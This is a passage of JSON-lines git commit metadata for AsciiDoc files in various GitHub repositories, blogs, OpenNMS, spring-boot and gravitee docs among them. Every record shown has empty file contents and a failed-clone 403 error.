JDBCQueryMonitor.adoc","message":"Create JDBCQueryMonitor.adoc","repos":"tdefilip\/opennms,rdkgit\/opennms,roskens\/opennms-pre-github,roskens\/opennms-pre-github,aihua\/opennms,roskens\/opennms-pre-github,rdkgit\/opennms,tdefilip\/opennms,rdkgit\/opennms,tdefilip\/opennms,aihua\/opennms,roskens\/opennms-pre-github,roskens\/opennms-pre-github,tdefilip\/opennms,aihua\/opennms,roskens\/opennms-pre-github,aihua\/opennms,tdefilip\/opennms,aihua\/opennms,aihua\/opennms,rdkgit\/opennms,roskens\/opennms-pre-github,rdkgit\/opennms,roskens\/opennms-pre-github,rdkgit\/opennms,rdkgit\/opennms,tdefilip\/opennms,aihua\/opennms,rdkgit\/opennms,rdkgit\/opennms,roskens\/opennms-pre-github,aihua\/opennms,aihua\/opennms,roskens\/opennms-pre-github,tdefilip\/opennms,roskens\/opennms-pre-github,rdkgit\/opennms,tdefilip\/opennms,tdefilip\/opennms","old_file":"opennms-doc\/guide-admin\/src\/asciidoc\/text\/poller\/JDBCQueryMonitor.adoc","new_file":"opennms-doc\/guide-admin\/src\/asciidoc\/text\/poller\/JDBCQueryMonitor.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/aihua\/opennms.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"f6bd9c9dedbb5d0d3cac5d360c1aa98f45c019c7","subject":"y2b create post Xbox One Hands-on!","message":"y2b create post Xbox One Hands-on!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-11-14-Xbox-One-Handson.adoc","new_file":"_posts\/2013-11-14-Xbox-One-Handson.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c329ae222970d8551a057364c73c7321e9183f0c","subject":"Update 2015-07-19-My-English-Title.adoc","message":"Update 2015-07-19-My-English-Title.adoc","repos":"chakbun\/chakbun.github.io,chakbun\/chakbun.github.io,chakbun\/chakbun.github.io","old_file":"_posts\/2015-07-19-My-English-Title.adoc","new_file":"_posts\/2015-07-19-My-English-Title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/chakbun\/chakbun.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8155eae5e13e88965492922108d1829b6a8deeab","subject":"--wip-- [skip ci]","message":"--wip-- [skip ci]\n","repos":"moccalotto\/kaos,moccalotto\/kaos","old_file":"_brainstorms\/sr-oneshot.asciidoc","new_file":"_brainstorms\/sr-oneshot.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/moccalotto\/kaos.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"038b8479718e1208cb04a09aa30cd618a66c9d97","subject":"y2b create post I Have A Problem...","message":"y2b create post I Have A Problem...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-01-21-I-Have-A-Problem.adoc","new_file":"_posts\/2017-01-21-I-Have-A-Problem.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"252cf762cc170cfad50d4e8da6544cafbda803b7","subject":"Update 2017-09-22-Yet-another-post.adoc","message":"Update 2017-09-22-Yet-another-post.adoc","repos":"koter84\/blog,koter84\/blog,koter84\/blog,koter84\/blog","old_file":"_posts\/2017-09-22-Yet-another-post.adoc","new_file":"_posts\/2017-09-22-Yet-another-post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/koter84\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e14dba634f95e99f5985c9ff82ffa5d1f3af1571","subject":"Update 2018-04-01-Why-did-you-do-that.adoc","message":"Update 2018-04-01-Why-did-you-do-that.adoc","repos":"anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog","old_file":"_posts\/2018-04-01-Why-did-you-do-that.adoc","new_file":"_posts\/2018-04-01-Why-did-you-do-that.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anandjagadeesh\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ce4ad8046ff9e653321743591d41da68c39e32d9","subject":"Update 2018-05-02-Azure-11.adoc","message":"Update 2018-05-02-Azure-11.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-05-02-Azure-11.adoc","new_file":"_posts\/2018-05-02-Azure-11.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8d879bdee279de611f62f9b96e765d61056e66ac","subject":"Update 2019-01-14-bash-D-B.adoc","message":"Update 2019-01-14-bash-D-B.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2019-01-14-bash-D-B.adoc","new_file":"_posts\/2019-01-14-bash-D-B.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1e7e11bdd8e76396876b57f060feaf106f050f10","subject":"Update NOTES","message":"Update NOTES\n","repos":"jxxcarlson\/noteshare,jxxcarlson\/noteshare,jxxcarlson\/noteshare,jxxcarlson\/noteshare","old_file":"NOTES.adoc","new_file":"NOTES.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jxxcarlson\/noteshare.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"018f52464524c03e20bcf553cb398930e69a4c3c","subject":"Welcome the GSoC students","message":"Welcome the GSoC students\n","repos":"hawkular\/hawkular.github.io,pilhuhn\/hawkular.github.io,Jiri-Kremser\/hawkular.github.io,lzoubek\/hawkular.github.io,jpkrohling\/hawkular.github.io,lucasponce\/hawkular.github.io,hawkular\/hawkular.github.io,objectiser\/hawkular.github.io,lucasponce\/hawkular.github.io,metlos\/hawkular.github.io,ppalaga\/hawkular.github.io,pilhuhn\/hawkular.github.io,jpkrohling\/hawkular.github.io,ppalaga\/hawkular.github.io,jsanda\/hawkular.github.io,jsanda\/hawkular.github.io,metlos\/hawkular.github.io,tsegismont\/hawkular.github.io,lucasponce\/hawkular.github.io,jotak\/hawkular.github.io,jotak\/hawkular.github.io,jsanda\/hawkular.github.io,Jiri-Kremser\/hawkular.github.io,Jiri-Kremser\/hawkular.github.io,lucasponce\/hawkular.github.io,pilhuhn\/hawkular.github.io,objectiser\/hawkular.github.io,metlos\/hawkular.github.io,metlos\/hawkular.github.io,tsegismont\/hawkular.github.io,jotak\/hawkular.github.io,jpkrohling\/hawkular.github.io,Jiri-Kremser\/hawkular.github.io,hawkular\/hawkular.github.io,jpkrohling\/hawkular.github.io,jotak\/hawkular.github.io,lzoubek\/hawkular.github.io,ppalaga\/hawkular.github.io,objectiser\/hawkular.github.io,tsegismont\/hawkular.github.io,lzoubek\/hawkular.github.io,hawkular\/hawkular.github.io,pilhuhn\/hawkular.github.io,ppalaga\/hawkular.github.io,jsanda\/hawkular.github.io,lzoubek\/hawkular.github.io,objectiser\/hawkular.github.io,tsegismont\/hawkular.github.io","old_file":"src\/main\/jbake\/content\/blog\/2015\/04\/29\/hello-to-gsoc-students.adoc","new_file":"src\/main\/jbake\/content\/blog\/2015\/04\/29\/hello-to-gsoc-students.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jotak\/hawkular.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ba2dffc77082755ffe8982a20e5e9ed54ff733d4","subject":"Update 2016-12-07-User-Dashboard-Design-Review.adoc","message":"Update 2016-12-07-User-Dashboard-Design-Review.adoc","repos":"scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io","old_file":"_posts\/2016-12-07-User-Dashboard-Design-Review.adoc","new_file":"_posts\/2016-12-07-User-Dashboard-Design-Review.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scottellis64\/scottellis64.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"20e51ca1ae25852b0b16118e5cf19602bd0011e7","subject":"Update 2014-11-24-3d-Prirazlomnaya-Making-Of.adoc","message":"Update 2014-11-24-3d-Prirazlomnaya-Making-Of.adoc","repos":"Sth0nian\/hubpress.io,Sth0nian\/hubpress.io,Sth0nian\/hubpress.io","old_file":"_posts\/2014-11-24-3d-Prirazlomnaya-Making-Of.adoc","new_file":"_posts\/2014-11-24-3d-Prirazlomnaya-Making-Of.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Sth0nian\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d4f02c3a4791faaf6ef1f960f17b42fa83106b81","subject":"Update 2003-03-03-Install-Zimbra-Mail-Server-87-OSE-on-Red-Hat.adoc","message":"Update 2003-03-03-Install-Zimbra-Mail-Server-87-OSE-on-Red-Hat.adoc","repos":"fauzanooor\/fauzanooor.github.io,fauzanooor\/fauzanooor.github.io,fauzanooor\/fauzanooor.github.io,fauzanooor\/fauzanooor.github.io","old_file":"_posts\/2003-03-03-Install-Zimbra-Mail-Server-87-OSE-on-Red-Hat.adoc","new_file":"_posts\/2003-03-03-Install-Zimbra-Mail-Server-87-OSE-on-Red-Hat.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fauzanooor\/fauzanooor.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1c9359c5c807a18534c4b2138bd7c91e45dc725b","subject":"Update 2017-10-16-Installing-and-Administering-RabbitMQ-on-Mac.adoc","message":"Update 2017-10-16-Installing-and-Administering-RabbitMQ-on-Mac.adoc","repos":"scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io","old_file":"_posts\/2017-10-16-Installing-and-Administering-RabbitMQ-on-Mac.adoc","new_file":"_posts\/2017-10-16-Installing-and-Administering-RabbitMQ-on-Mac.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scottellis64\/scottellis64.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7c094ada693b6fecb928dca0c7f301fb81f97f37","subject":"added kafka config","message":"added kafka config\n","repos":"gravitee-io\/gravitee-docs,gravitee-io\/gravitee-docs,gravitee-io\/gravitee-docs","old_file":"pages\/apim\/3.x\/user-guide\/publisher\/sme\/kafka-connector-configuration.adoc","new_file":"pages\/apim\/3.x\/user-guide\/publisher\/sme\/kafka-connector-configuration.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gravitee-io\/gravitee-docs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b28215cc91c2669162b75d3d4963f3c1755175af","subject":"Blog post for BTM 0.3.0.Final","message":"Blog post for BTM 0.3.0.Final\n","repos":"jsanda\/hawkular.github.io,pilhuhn\/hawkular.github.io,pilhuhn\/hawkular.github.io,objectiser\/hawkular.github.io,jotak\/hawkular.github.io,hawkular\/hawkular.github.io,lucasponce\/hawkular.github.io,lucasponce\/hawkular.github.io,objectiser\/hawkular.github.io,jotak\/hawkular.github.io,tsegismont\/hawkular.github.io,lzoubek\/hawkular.github.io,lzoubek\/hawkular.github.io,tsegismont\/hawkular.github.io,jpkrohling\/hawkular.github.io,tsegismont\/hawkular.github.io,jotak\/hawkular.github.io,lucasponce\/hawkular.github.io,pilhuhn\/hawkular.github.io,pilhuhn\/hawkular.github.io,jpkrohling\/hawkular.github.io,jsanda\/hawkular.github.io,jpkrohling\/hawkular.github.io,hawkular\/hawkular.github.io,tsegismont\/hawkular.github.io,hawkular\/hawkular.github.io,objectiser\/hawkular.github.io,lucasponce\/hawkular.github.io,lzoubek\/hawkular.github.io,jsanda\/hawkular.github.io,lzoubek\/hawkular.github.io,objectiser\/hawkular.github.io,hawkular\/hawkular.github.io,jpkrohling\/hawkular.github.io,jotak\/hawkular.github.io,jsanda\/hawkular.github.io","old_file":"src\/main\/jbake\/content\/blog\/2015\/08\/14\/hawkular-btm-0.3.0-demo.adoc","new_file":"src\/main\/jbake\/content\/blog\/2015\/08\/14\/hawkular-btm-0.3.0-demo.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jotak\/hawkular.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"74d84d64c526bce49b9a127c7d9faf86db364410","subject":"Update 2018-11-02-Amazon-Linux-E-C2chrony.adoc","message":"Update 2018-11-02-Amazon-Linux-E-C2chrony.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-11-02-Amazon-Linux-E-C2chrony.adoc","new_file":"_posts\/2018-11-02-Amazon-Linux-E-C2chrony.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"366305aad86eb5cb041db23d42323434f152dc45","subject":"Create messaging.asciidoc","message":"Create messaging.asciidoc","repos":"aparnachaudhary\/nagios-plugin-jbossas7,apaolini\/nagios-plugin-jbossas7,apaolini\/nagios-plugin-jbossas7","old_file":"messaging.asciidoc","new_file":"messaging.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/aparnachaudhary\/nagios-plugin-jbossas7.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"077318e9e2921679179c29da660e59b138d87992","subject":"Update 2017-07-24-full-text-search-by-mongodb-and-elasticsearch.adoc","message":"Update 2017-07-24-full-text-search-by-mongodb-and-elasticsearch.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-07-24-full-text-search-by-mongodb-and-elasticsearch.adoc","new_file":"_posts\/2017-07-24-full-text-search-by-mongodb-and-elasticsearch.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7a6d131bcbd5318e40e96e5d034bfdb4ca0e736a","subject":"Tip - get your work reviewed","message":"Tip - get your work reviewed\n","repos":"eddiejaoude\/book-open-source-tips","old_file":"src\/do.adoc","new_file":"src\/do.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/eddiejaoude\/book-open-source-tips.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6ab340d10ffa20fd06d61c682c78cb16c9e124f8","subject":"docs : Create CONTRIBUTING file","message":"docs : Create CONTRIBUTING file\n","repos":"gravitee-io\/gravitee-management-rest-api,gravitee-io\/gravitee-management-rest-api,gravitee-io\/gravitee-management-rest-api","old_file":"CONTRIBUTING.adoc","new_file":"CONTRIBUTING.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gravitee-io\/gravitee-management-rest-api.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"9f413230307cd7d119b0ac707022744f77694e2d","subject":"Update CONTRIBUTING.adoc","message":"Update CONTRIBUTING.adoc\n\nUpdate the Oomph instructions.","repos":"xiaoleiPENG\/my-project,shangyi0102\/spring-boot,olivergierke\/spring-boot,htynkn\/spring-boot,linead\/spring-boot,ilayaperumalg\/spring-boot,philwebb\/spring-boot-concourse,brettwooldridge\/spring-boot,ihoneymon\/spring-boot,NetoDevel\/spring-boot,chrylis\/spring-boot,dreis2211\/spring-boot,bjornlindstrom\/spring-boot,hqrt\/jenkins2-course-spring-boot,jvz\/spring-boot,kamilszymanski\/spring-boot,afroje-reshma\/spring-boot-sample,ptahchiev\/spring-boot,philwebb\/spring-boot,kamilszymanski\/spring-boot,Nowheresly\/spring-boot,hello2009chen\/spring-boot,lucassaldanha\/spring-boot,javyzheng\/spring-boot,htynkn\/spring-boot,SaravananParthasarathy\/SPSDemo,izeye\/spring-boot,kamilszymanski\/spring-boot,qerub\/spring-boot,nebhale\/spring-boot,shakuzen\/spring-boot,rweisleder\/spring-boot,jayarampradhan\/spring-boot,donhuvy\/spring-boot,thomasdarimont\/spring-boot,kamilszymanski\/spring-boot,spring-projects\/spring-boot,minmay\/spring-boot,candrews\/spring-boot,ollie314\/spring-boot,lburgazzoli\/spring-boot,philwebb\/spring-boot,candrews\/spring-boot,lucassaldanha\/spring-boot,i007422\/jenkins2-course-spring-boot,isopov\/spring-boot,sebastiankirsch\/spring-boot,joshiste\/spring-boot,felipeg48\/spring-boot,tsachev\/spring-boot,donhuvy\/spring-boot,cleverjava\/jenkins2-course-spring-boot,akmaharshi\/jenkins,jvz\/spring-boot,bijukunjummen\/spring-boot,spring-projects\/spring-boot,herau\/spring-boot,habuma\/spring-boot,aahlenst\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,Nowheresly\/spring-boot,Buzzardo\/spring-boot,rweisleder\/spring-boot,shakuzen\/spring-boot,felipeg48\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,drumonii\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,scottfrederick\/spring-boot,philwebb\/spring-boot-concourse,bijukunjummen\/spring-boot,tsachev\/spring-boot,jxblum\/spring-boot,qerub\/spring-boot,vakninr\/spring-boot,sebastiankirsch\/spring-boot,hqrt\/jenkins2-course-spring-boot,minmay\/spring-boot,NetoDevel\/spring-boot,vakninr\/spring-boot,olivergierke\/spring-boot,zhanhb\/spring-boot,bbrouwer\/spring-boot,pvorb\/spring-boot,Nowheresly\/spring-boot,mbogoevici\/spring-boot,lexandro\/spring-boot,pvorb\/spring-boot,mdeinum\/spring-boot,joshthornhill\/spring-boot,i007422\/jenkins2-course-spring-boot,rajendra-chola\/jenkins2-course-spring-boot,felipeg48\/spring-boot,joshiste\/spring-boot,DeezCashews\/spring-boot,Buzzardo\/spring-boot,mbogoevici\/spring-boot,hello2009chen\/spring-boot,aahlenst\/spring-boot,ollie314\/spring-boot,wilkinsona\/spring-boot,scottfrederick\/spring-boot,afroje-reshma\/spring-boot-sample,sbcoba\/spring-boot,lexandro\/spring-boot,RichardCSantana\/spring-boot,mosoft521\/spring-boot,jxblum\/spring-boot,spring-projects\/spring-boot,shakuzen\/spring-boot,joshiste\/spring-boot,drumonii\/spring-boot,vpavic\/spring-boot,RichardCSantana\/spring-boot,mbenson\/spring-boot,neo4j-contrib\/spring-boot,spring-projects\/spring-boot,mbenson\/spring-boot,yhj630520\/spring-boot,minmay\/spring-boot,linead\/spring-boot,ollie314\/spring-boot,joshthornhill\/spring-boot,akmaharshi\/jenkins,cleverjava\/jenkins2-course-spring-boot,hello2009chen\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,i007422\/jenkins2-course-spring-boot,lucassaldanha\/spring-boot,dreis2211\/spring-boot,ptahchiev\/spring-boot,mdeinum\/spring-boot,mdeinum\/spring-boot,bjornlindstrom\/spring-boot,vpavic\/spring-boot,mosoft521\/spring-boot,xiaoleiPENG\/my-project,jvz\/spring-boot,thomasdarimont\/spring-boot,aahlenst\/spring-boot,DeezCashews\/spring-boot,jxblum\/spring-boot,kamilszymanski\/spring-boot,kdvolder\/spring-boot,michael-simons\/spring-boot,yangdd1205\/spring-boot,SaravananParthasarathy\/SPSDemo,joshthornhill\/spring-boot,jbovet\/spring-boot,minmay\/spring-boot,jmnarloch\/spring-boot,xiaoleiPENG\/my-project,Buzzardo\/spring-boot,yangdd1205\/spring-boot,jmnarloch\/spring-boot,jayarampradhan\/spring-boot,neo4j-contrib\/spring-boot,jxblum\/spring-boot,javyzheng\/spring-boot,bbrouwer\/spring-boot,yhj630520\/spring-boot,lexandro\/spring-boot,minmay\/spring-boot,wilkinsona\/spring-boot,vpavic\/spring-boot,shangyi0102\/spring-boot,tiarebalbi\/spring-boot,aahlenst\/spring-boot,ilayaperumalg\/spring-boot,jayarampradhan\/spring-boot,joshiste\/spring-boot,jmnarloch\/spring-boot,herau\/spring-boot,tsachev\/spring-boot,shakuzen\/spring-boot,jbovet\/spring-boot,SaravananParthasarathy\/SPSDemo,vakninr\/spring-boot,DeezCashews\/spring-boot,philwebb\/spring-boot,michael-simons\/spring-boot,bclozel\/spring-boot,joshthornhill\/spring-boot,yhj630520\/spring-boot,vpavic\/spring-boot,joansmith\/spring-boot,NetoDevel\/spring-boot,jbovet\/spring-boot,tsachev\/spring-boot,bijukunjummen\/spring-boot,zhanhb\/spring-boot,NetoDevel\/spring-boot,deki\/spring-boot,spring-projects\/spring-boot,scottfrederick\/spring-boot,vakninr\/spring-boot,olivergierke\/spring-boot,lenicliu\/spring-boot,deki\/spring-boot,royclarkson\/spring-boot,RichardCSantana\/spring-boot,javyzheng\/spring-boot,jbovet\/spring-boot,pvorb\/spring-boot,kdvolder\/spring-boot,dreis2211\/spring-boot,bijukunjummen\/spring-boot,afroje-reshma\/spring-boot-sample,hqrt\/jenkins2-course-spring-boot,tsachev\/spring-boot,mosoft521\/spring-boot,neo4j-contrib\/spring-boot,mdeinum\/spring-boot,tsachev\/spring-boot,DeezCashews\/spring-boot,habuma\/spring-boot,chrylis\/spring-boot,eddumelendez\/spring-boot,shangyi0102\/spring-boot,kdvolder\/spring-boot,cleverjava\/jenkins2-course-spring-boot,Buzzardo\/spring-boot,jayarampradhan\/spring-boot,jmnarloch\/spring-boot,mdeinum\/spring-boot,jxblum\/spring-boot,cleverjava\/jenkins2-course-spring-boot,dreis2211\/spring-boot,bjornlindstrom\/spring-boot,akmaharshi\/jenkins,xiaoleiPENG\/my-project,lburgazzoli\/spring-boot,olivergierke\/spring-boot,lburgazzoli\/spring-boot,donhuvy\/spring-boot,bbrouwer\/spring-boot,qerub\/spring-boot,habuma\/spring-boot,shangyi0102\/spring-boot,chrylis\/spring-boot,izeye\/spring-boot,bclozel\/spring-boot,linead\/spring-boot,candrews\/spring-boot,philwebb\/spring-boot,jmnarloch\/spring-boot,Nowheresly\/spring-boot,javyzheng\/spring-boot,hello2009chen\/spring-boot,wilkinsona\/spring-boot,jvz\/spring-boot,candrews\/spring-boot,ihoneymon\/spring-boot,deki\/spring-boot,qerub\/spring-boot,isopov\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,SaravananParthasarathy\/SPSDemo,rweisleder\/spring-boot,pvorb\/spring-boot,ihoneymon\/spring-boot,afroje-reshma\/spring-boot-sample,deki\/spring-boot,royclarkson\/spring-boot,ihoneymon\/spring-boot,felipeg48\/spring-boot,habuma\/spring-boot,lucassaldanha\/spring-boot,shakuzen\/spring-boot,isopov\/spring-boot,jxblum\/spring-boot,zhanhb\/spring-boot,joansmith\/spring-boot,pvorb\/spring-boot,isopov\/spring-boot,philwebb\/spring-boot-concourse,tiarebalbi\/spring-boot,eddumelendez\/spring-boot,philwebb\/spring-boot-concourse,neo4j-contrib\/spring-boot,drumonii\/spring-boot,lenicliu\/spring-boot,kdvolder\/spring-boot,htynkn\/spring-boot,yangdd1205\/spring-boot,eddumelendez\/spring-boot,donhuvy\/spring-boot,royclarkson\/spring-boot,sebastiankirsch\/spring-boot,eddumelendez\/spring-boot,mbenson\/spring-boot,xiaoleiPENG\/my-project,lburgazzoli\/spring-boot,ollie314\/spring-boot,htynkn\/spring-boot,hqrt\/jenkins2-course-spring-boot,joansmith\/spring-boot,vakninr\/spring-boot,michael-simons\/spring-boot,sbcoba\/spring-boot,linead\/spring-boot,chrylis\/spring-boot,i007422\/jenkins2-course-spring-boot,royclarkson\/spring-boot,sbcoba\/spring-boot,rweisleder\/spring-boot,afroje-reshma\/spring-boot-sample,NetoDevel\/spring-boot,dreis2211\/spring-boot,ilayaperumalg\/spring-boot,bjornlindstrom\/spring-boot,spring-projects\/spring-boot,vpavic\/spring-boot,neo4j-contrib\/spring-boot,mbogoevici\/spring-boot,eddumelendez\/spring-boot,deki\/spring-boot,joshiste\/spring-boot,herau\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,wilkinsona\/spring-boot,izeye\/spring-boot,tiarebalbi\/spring-boot,lexandro\/spring-boot,lexandro\/spring-boot,SaravananParthasarathy\/SPSDemo,kdvolder\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,htynkn\/spring-boot,nebhale\/spring-boot,scottfrederick\/spring-boot,ilayaperumalg\/spring-boot,felipeg48\/spring-boot,brettwooldridge\/spring-boot,RichardCSantana\/spring-boot,mdeinum\/spring-boot,mbogoevici\/spring-boot,scottfrederick\/spring-boot,wilkinsona\/spring-boot,vpavic\/spring-boot,tiarebalbi\/spring-boot,donhuvy\/spring-boot,bclozel\/spring-boot,cleverjava\/jenkins2-course-spring-boot,ptahchiev\/spring-boot,lenicliu\/spring-boot,aahlenst\/spring-boot,habuma\/spring-boot,Buzzardo\/spring-boot,herau\/spring-boot,rweisleder\/spring-boot,nebhale\/spring-boot,htynkn\/spring-boot,brettwooldridge\/spring-boot,DeezCashews\/spring-boot,nebhale\/spring-boot,mosoft521\/spring-boot,sebastiankirsch\/spring-boot,michael-simons\/spring-boot,isopov\/spring-boot,bclozel\/spring-boot,thomasdarimont\/spring-boot,ollie314\/spring-boot,eddumelendez\/spring-boot,Buzzardo\/spring-boot,brettwooldridge\/spring-boot,mbogoevici\/spring-boot,hqrt\/jenkins2-course-spring-boot,aahlenst\/spring-boot,ihoneymon\/spring-boot,philwebb\/spring-boot,sbcoba\/spring-boot,rweisleder\/spring-boot,herau\/spring-boot,ptahchiev\/spring-boot,isopov\/spring-boot,thomasdarimont\/spring-boot,ptahchiev\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,ihoneymon\/spring-boot,mosoft521\/spring-boot,ptahchiev\/spring-boot,mbenson\/spring-boot,lburgazzoli\/spring-boot,akmaharshi\/jenkins,tiarebalbi\/spring-boot,yhj630520\/spring-boot,habuma\/spring-boot,bbrouwer\/spring-boot,jayarampradhan\/spring-boot,hello2009chen\/spring-boot,ilayaperumalg\/spring-boot,ilayaperumalg\/spring-boot,linead\/spring-boot,drumonii\/spring-boot,zhanhb\/spring-boot,bclozel\/spring-boot,Nowheresly\/spring-boot,lenicliu\/spring-boot,michael-simons\/spring-boot,zhanhb\/spring-boot,bclozel\/spring-boot,philwebb\/spring-boot,joshthornhill\/spring-boot,lenicliu\/spring-boot,sebastiankirsch\/spring-boot,brettwooldridge\/spring-boot,scottfrederick\/spring-boot,drumonii\/spring-boot,bjornlindstrom\/spring-boot,chrylis\/spring-boot,javyzheng\/spring-boot,zhanhb\/spring-boot,qerub\/spring-boot,dreis2211\/spring-boot,shakuzen\/spring-boot,tiarebalbi\/spring-boot,jvz\/spring-boot,philwebb\/spring-boot-concourse,wilkinsona\/spring-boot,izeye\/spring-boot,akmaharshi\/jenkins,olivergierke\/spring-boot,yhj630520\/spring-boot,i007422\/jenkins2-course-spring-boot,drumonii\/spring-boot,mbenson\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,RichardCSantana\/spring-boot,bijukunjummen\/spring-boot,chrylis\/spring-boot,bbrouwer\/spring-boot,thomasdarimont\/spring-boot,donhuvy\/spring-boot,royclarkson\/spring-boot,lucassaldanha\/spring-boot,candrews\/spring-boot,felipeg48\/spring-boot,joansmith\/spring-boot,joshiste\/spring-boot,nebhale\/spring-boot,sbcoba\/spring-boot,mbenson\/spring-boot,joansmith\/spring-boot,izeye\/spring-boot,michael-simons\/spring-boot,jbovet\/spring-boot,shangyi0102\/spring-boot,kdvolder\/spring-boot","old_file":"CONTRIBUTING.adoc","new_file":"CONTRIBUTING.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mbogoevici\/spring-boot.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"76a43b74905fc1c777a46bf086d7e8af7535fcc8","subject":"docs : Create CONTRIBUTING file","message":"docs : Create CONTRIBUTING file\n","repos":"gravitee-io\/gravitee-repository-elasticsearch","old_file":"CONTRIBUTING.adoc","new_file":"CONTRIBUTING.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 